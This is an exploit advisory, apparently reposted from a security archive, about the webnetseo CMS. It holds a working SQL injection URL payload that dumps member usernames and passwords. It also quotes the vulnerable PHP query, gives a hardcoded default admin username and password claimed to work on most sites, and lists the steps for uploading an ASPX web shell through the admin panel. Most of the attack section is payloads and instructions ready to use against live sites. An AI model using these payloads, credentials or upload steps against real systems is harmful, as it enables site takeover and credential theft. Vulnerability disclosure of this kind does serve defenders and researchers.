webnetseo CMS Multiple Vulnerabilities

2017.05.07
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

########################################################### # Exploit Title : webnetseo CMS Multiple Vulnerabilities # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage: webnetseo.net # Date : 2017 07 May # Category : WebApp # MY HOME : Ashiyane.org # CWE : CWE-89 - CWE-276 And ... # Video : https://www.youtube.com/watch?v=dZLDPYJeLSw ########################################################### webnetseo CMS Multiple Vulnerabilities 1-SQL INJECTION 2-Default Account 3-Upload shell - ASPX Research by Ashiyane Digital Security Team ########################################################### 1-SQL INJECTION Some sql Vulnerability location /picc.php?id= Localhost://picc.php?id=-[inputSQL]+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%20from+member--+/ source Vulnerability files : Picc.php $id=$_GET["id"]; $id2=$_GET["id2"]; $id3=$_GET["id3"]; $strQuery = "SELECT * FROM pic where id > '$id' && class_id='$id3' order by id asc"; $db->query($strQuery); if($db->next_record()){ echo '<a href="picc.php?id='.$db->f("id").'&id3='.f("class_id").'" style="font-size:12px; font-weight:normal; " >'.$db->f("title").'</a>'; }else{ echo "?"; } ?></td> </tr> ########################################################### 2-Default Account 90% sites Default Account Default Account USER : yxy746380 PASS : 746380 ########################################################### 3-Upload shell - ASPX go to TARGET.COM/admin/pic.php?id=2 upload ASPX And ASP shell shell location : TARGET.COM/images/upload_file/[RandonName.aspx] finishd ################################################ # Discovered By : Hassan Shakeri # Twitter : @ShakeriHassan - Fb.com/General.BlackHat - Me@Seravo.ir ###########################################################

References:

https://www.youtube.com/watch?v=dZLDPYJeLSw


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top